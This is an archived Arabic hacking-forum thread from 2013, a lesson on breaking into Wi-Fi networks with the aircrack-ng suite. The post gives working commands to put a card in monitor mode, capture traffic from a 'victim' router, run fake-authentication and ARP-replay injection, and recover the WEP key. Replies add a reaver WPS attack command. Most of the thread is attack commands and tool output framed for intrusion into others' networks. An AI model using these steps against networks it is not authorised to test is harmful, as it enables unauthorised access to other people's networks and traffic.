المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : الدرس الثاني ... الحرب الاكترونية



شايار
09-20-2013, 12:56 AM
بسم الله و السلام عليكم ورحمة الله

جميع الحقوق محفوظة

لا نقبل اي نسخ دون ذكر الكاتب مع المصدر (جيوش الهكر)

اليوم نشرج فقط aircrack-ng

و تنقسم هذه الاداة الى :


Aircrack-ng suite



airbase-ng -- Multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself.


aircrack-ng -- 802.11 WEP and WPA/WPA2-PSK key cracking program.


airdecap-ng -- Decrypt WEP/WPA/WPA2 capture files.


airdecloak-ng -- Remove WEP Cloaking™ from a packet capture file.


airdriver-ng -- Script providing information and allowing installation of wireless drivers.


airdrop-ng -- A rule based wireless deauthication tool.


aireplay-ng -- Inject and replay wireless frames.


airgraph-ng -- Graph wireless networks.


airmon-ng -- Enable and disable monitor mode on wireless interfaces.


airodump-ng -- Capture raw 802.11 frames.


airolib-ng -- Precompute WPA/WPA2 passphrases in a database to use it later with aircrack-ng.


airserv-ng -- Wireless card TCP/IP server which allows multiple application to use a wireless card.


airtun-ng -- Virtual tunnel interface creator.


easside-ng -- Auto-magic tool which allows you to communicate to an WEP-encrypted Access Point without knowing the key.


packetforge-ng -- Create various type of encrypted packets that can be used for injection.


tkiptun-ng -- Proof-of-concept implementation the WPA/TKIP attack: inject a few frames into a WPA TKIP network with QoS


wesside-ng -- Auto-magic tool which incorporates a number of techniques to seamlessly obtain a WEP key in minutes.


Other tools - WZCook and ivstools



و هذه دورة باللغة الاجنبية انصحكم بها

http://www.youtube.com/channel/UCs XFyEN eECz klAXj f95oK Ag/v ideo s


طبعا هذا لا يعني اني لن اشرح الادوات ... لا لا راح اشرحها بس مو كلها بس المهم

اهم اداة من ادوات ايركراك هي :

airmon-ng
airodump-ng
aireplay-ng
airdrop-ng
aircrack-ng

اول اداة ... هذي الاداة من اهم الادوات و لو من دونها لايمكن عمل اي شي

هذه الاداة لو كتبت في ال"الطرفية"(terminal) و تكتب "airmon-ng" راح تلاحظ يكتبلك كروت الوايرليس الموجودة عندك

https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-ash3/1236118_1382861241946493_1595478078_n.jpg

الدرس الثالث الحرب الاكترونية
الان تلاحظ وجود wlan0 و هذه كارت الوايرليس تبعي لو مكانش موجود اي كارت واير ليس هذا لازم تدخل عل درس حل مشكلة الواير ليس و انشاء الله في الدرس القادم

والان حتى نبدي نخترق الوايرليس لازم نعرف انو الكرت الشبكة كبيرة و راح نعملها فرع

تسالون كيف اقولكم راح نكتب بالترمنال "الطرفية"

airmon-ng start wlan0

راح تلاحظ الصورة التالية

https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash3/553585_1382861248613159_1528852244_n.jpg

احنة الي يهمنا اخر سطر و الي هو "monitor mode enabled on mon0"

تمام الان ننسى wlan0 راح يكون كل شغلنا عل mon0

الان عملنا شبكة فرعية لسهولة العمل

خلص شغلنا عل airmon-ng

نجي عل airodump-ng

هذه الاداة وضيفتها اختراق الاشبكات + عرض الشبكات الموجودة حولك مع كل المعلومات

الان شوية ندرس الاداة لانها مهمة جدا

نكتب في ترمنال"الطرفية" airodump-ng


________________________________________

Airodump-ng 1.1 - (C) 2006-2010 Thomas d'Otreppe
Original work: Christophe Devine
Aircrack-ng

usage: airodump-ng <options> <interface>[,<interface>,...]

Options:
--ivs : Save only captured IVs
--gpsd : Use GPSd
--write <prefix> : Dump file prefix
-w : same as --write
--beacons : Record all beacons in dump file
--update <secs> : Display update delay in seconds
--showack : Prints ack/cts/rts statistics
-h : Hides known stations for --showack
-f <msecs> : Time in ms between hopping channels
--berlin <secs> : Time before removing the AP/client
from the screen when no more packets
are received (Default: 120 seconds)
-r <file> : Read packets from that file
-x <msecs> : Active Scanning Simulation
--output-format
<formats> : Output format. Possible values:
pcap, ivs, csv, gps, kismet, netxml

Filter options:
--encrypt <suite> : Filter APs by cipher suite
--netmask <netmask> : Filter APs by mask
--bssid <bssid> : Filter APs by BSSID
-a : Filter unassociated clients

By default, airodump-ng hop on 2.4GHz channels.
You can make it capture on other/specific channel(s) by using:
--channel <channels>: Capture on specific channels
--band <abg> : Band on which airodump-ng should hop
-C <frequencies> : Uses these frequencies in MHz to hop
--cswitch <method> : Set channel switching method
0 : FIFO (default)
1 : Round Robin
2 : Hop on last
-s : same as --cswitch

--help : Displays this usage screen

No interface specified.

______________________________________________


خخخخخخخخخ اكيد الكل ميفتهم .... هسة افهمكم المهم بس

لو تكتب في ترمنال

airodump-ng mon0

راح يعرضلك الشبكات الموجودة حولك

مثال :

https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-ash3/1236479_1382861275279823_1628740662_n.jpg

لون الاحمر هو اسماء الشبكات الموجودة حولك
لون الاصفر نوع تشفير الباس
لون الازرق هو ماك ادرس حق الراوتر
لون اخضر هو بوكيت المرسلة والمستقبلة و الضائعة
لان نشرح الوردي و الازرق الفاتح

راح تشوفون مكتوب bssid و station

الاماك ادرس الموجود في الازرق الفاتح هي راوتر

و الماك ادرس المجودة في لون الوردي هي اجهزة موجودة عل هذا الراوتر مثلا انا ماك ادرس راوتري عليها جهاز واحد وهي جهازي

المهم خلصنا من هذا نجي عل امر غيرها و هي لو كتبنا في ترمنال

airodump-ng --channel [Victim channel] --write [NAME] --bssid [Victim BSSID] [your interface]

الان هذه طريقة جلب باس لكنها تكون مشفرة

تكتبون بدل هذه الكلمات حسب نوع الشبكة الي حولك

نسيت اخبركم عن كيفية استغراج [Victim channel] و هي تكون بين لون اصفر و الازرق تكتب تحت CH

و ثاني شي [NAME] نكتب هون اي سم تريد بس يكون ما فيها فراغات

و ثالث شي [Victim BSSID] نكتب الماك ادرس حق الراوتر

و رابع شي [your interface] نكتب اهنا mon0 نكتب النت الي عملناها فرعي و دائما تكون mon0

مثال : airodump-ng --channel 11 --write shayar --bssid 11:22:33:44:55:66 mon0]

الان نضغط انتر

و نفتح ترمنال جديد

و الان نروح عل اداة aireplay-ng و نكتبها في ترمنال اسم الاداة


Aireplay-ng 1.1 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe
Original work: Christophe Devine
Aircrack-ng

usage: aireplay-ng <options> <replay interface>

Filter options:

-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection

Replay options:

-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-g value : change ring buffer size (default: 8)
-F : choose first matching packet

Fakeauth attack options:

-e essid : set target AP SSID
-o npckts : number of packets per burst (0=auto, default: 1)
-q sec : seconds between keep-alives
-y prga : keystream for shared key auth
-T n : exit after retry fake auth request n time

Arp Replay attack options:

-j : inject FromDS packets

Fragmentation attack options:

-k IP : set destination IP in fragments
-l IP : set source IP in fragments

Test attack options:

-B : activates the bitrate test

Source options:

-i iface : capture packets from this interface
-r file : extract packets from this pcap file

Miscellaneous options:

-R : disable /dev/rtc usage

Attack modes (numbers can still be used):

--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--test : tests injection and quality (-9)

--help : Displays this usage screen

No replay interface specified.

طبعا الي يريد يدرس الاداة يقراها و احنة الي نريدها اختراق و راح ندرس الي بس نريدها


aireplay-ng -1 0 -a [Victrim BSSID] [your interface]

طبعا عارفين [Victrim BSSID] هي ماك ادرس حق الراوتر

و [your interface] هي mon0

الان نفتح ترمنال جديد

و

aireplay-ng -3 -b [Victim BSSID] [your interface]

ما راح اعيد و هيك يكون خلصنا جزء الاول نجي للجزء الثاني

و هي فك التشفير

الان لو فتحت مجلد root راح تلقا فيها ملفات جديدة
و الملفات مسمى عل الي كتبناه في [NAME]


هذه ملفات مشفرة تحتوي عل الباس نروح الى اداة aircrack-ng

و هذه الاداة يقوم بفك تشفير الباس او الملف بامدادات cap

و نقوم بكتابة

aircrack-ng -b [victrim bssid] [*.cap]

راح تلاقي الاداة يكشف التشفير
و راح يكتبلك

https://fbcdn-sphotos-a-a.akamaihd.net/hphotos-ak-prn1/13013_1382861255279825_736794124_n.jpg

key found

و تلاحظ مكتوب الباس بين قوسين و انت شيل : و يصير الباس يعني مثلا انا طلعلي 11:33:44:88:sf:99

يعني الباس حق الشبكة هي sf9911334488

و خلص درسنا و الحمدالله

اخوكم شايار

للاستفسار : [email protected]

جميع الحقوق محفوظة ...الدرس الثاني ... الحرب الاكترونية

Jordan Ghost
09-20-2013, 03:14 AM
ﻣﺸﻜﻮﺭ حبي ﺑﺲ ﻣﻌﻠﺶ ﺍﻋﻠﻘﻠﻚ ﻋﻠﻰ ﺷﻐﻠﺔ ﻟﻮ ﺗﻮﺿﻊ ﺻﻮﺭ ﻟﻠﺸﺮﺡ ﻭﺷﻮﻳﻪ ﺗﺮﺗﻴﺐ ﻳﻂﻠﻊ ﺷﺮﺡ ﻣﻤﻴﺰ ﻣﺸﻜﻮﺭ ﺟﺪﺍ

شايار
09-20-2013, 04:06 PM
والله اخي الصور ممكن متكون واضحة دئما و بعض الاحيان الصور ما نحتاجها مثلا لجملة و حدة ميريد اصور و احمل صور و اجيب الروابط يعني الشغل طويل بس في اشياء ما تفتهم بدون صور :\ و انشاء الله احط صور اكثر في الدروس الجاية

dark prince
09-20-2013, 08:40 PM
مشكور للطرح اخي واصل


رتب اكثر في المرة القادمة

rayen
09-20-2013, 09:04 PM
مشكور يا اخي جدا لكن شرح شوية مو مرتب

Iraqe Hacker
09-20-2013, 10:35 PM
على الجايات طور المواضيع بارك الله فيك طرح حلو ومفيد

hacker.hearts
09-21-2013, 08:22 PM
يسلمو الايادي

قهر اليهود
09-21-2013, 08:48 PM
بارك الله فيك

alialsaadi
09-23-2013, 02:33 PM
حبيبي اولا السلام عليكم بس اني يطلعلي(please specify a dictionaary)ارجو المساعدة
ملاحظة:هاي الرسالة تطلعلي من اريد افك تشفير الملف:(

bachir66
09-23-2013, 10:39 PM
مشكور للطرح اخي واصل

refland
10-01-2013, 04:18 AM
الشرح كان جميل
بس فيه نقطة احب ان اضيفها كي تكون الصورة واضحة وهي كالتالي
وانت تستخرج الشبكات بامر
airmon-ng
وتحدد نوع البطاقة بين
wlan0 or mon0
وتستعرض الكارت واليرلس لكل شبكة ونوعها حتى تصل الى امر
aireplay-ng
يجب ان يصل
data
الى مابين
18.000
or
20.000
بعدها نطبق امر
aircrack-ng
دي نقطة وفيه ملاحظة اخرى جد مهمة من يثبت الباتراك على نظام وهي لازم يتوفر على
alfanetwork
ككارت ريزوا خارجي
لو ثبت على نمط اقلاع ذاتي بجانب الويندوز مافي مشكل الاوامر ستعمل شرط تكون الكارت ريزوا بتاع من نوع injiction
وفيه اداة عظيمة جدا تسمى
reaver
دي لاتحتاج الى اي تفاضيل ثقط تثبت الااداة على النظام ثم تطبق الامر التالي
reaver -i mon0 -b mac adrr --vv
الماك ادريس نستخرجه بالامر التالي
airmon-ng start wlan0
airodum-ng .....
انتم ستسالوني كيف نثبت الاداة
الاداة تثبت كالتالي
apt-get install reaver
على فكرة هي تفتح الاتنين
wep or wap

وشكرا

shadow_tdk
10-01-2013, 03:05 PM
مشكووووووووووور

شايار
10-03-2013, 09:01 PM
اخي refland

ما اضن يحتاج اضافات و ثانيا اني راح اعطي درس كامل عن الريفير -_-

احمد احمدو
11-01-2013, 10:50 AM
شكراااااااااااااااااااااا اااااااااااااااااا

hack57
11-08-2013, 03:35 AM
جزاك الله خيرا يا اخي

كاسر المشاعر
11-08-2013, 02:07 PM
http://www.samysoft.net/forumim/shokr/2/80898296.gif

ahmad_an35
11-10-2013, 02:20 PM
مششكور يعطيك العافيهه